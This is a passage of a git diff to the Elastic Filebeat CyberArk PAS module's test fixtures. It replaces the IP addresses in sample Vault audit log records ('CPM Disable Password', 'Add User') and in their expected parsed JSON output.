mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Disable Password</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>130</MessageID>\n    <Desc>CPM Disable Password</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Disable Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Disable Password</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json
index b99a40e81604..7701671a6d2e 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json
@@ -2,7 +2,7 @@
     {
         "@timestamp": "2021-03-15T12:57:13.000Z",
         "cyberarkpas.audit.action": "CPM Disable Password",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.cpm_disabled": "(CPM)MaxRetries",
         "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
@@ -10,21 +10,21 @@
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615813031",
         "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask",
         "cyberarkpas.audit.ca_properties.retries_count": "5",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart",
         "cyberarkpas.audit.desc": "CPM Disable Password",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.other.retriescount": "5",
         "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T12:57:13Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Disable Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>130</MessageID>\n    <Desc>CPM Disable Password</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Disable Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Disable Password</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 05:57:13</Timestamp>\n    <IsoTimestamp>2021-03-15T12:57:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>130</MessageID>\n    <Desc>CPM Disable Password</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Disable Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Disable Password</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"5\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615813031\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
@@ -46,7 +46,7 @@
             "change",
             "user"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log
index 78ec9f57fe68..2f9c4e58db73 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log
@@ -1,12 +1,12 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:36</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_VAGRANT</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPGW_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
-<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMP_ADB_asr-cyberark-psm-ssh</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}}
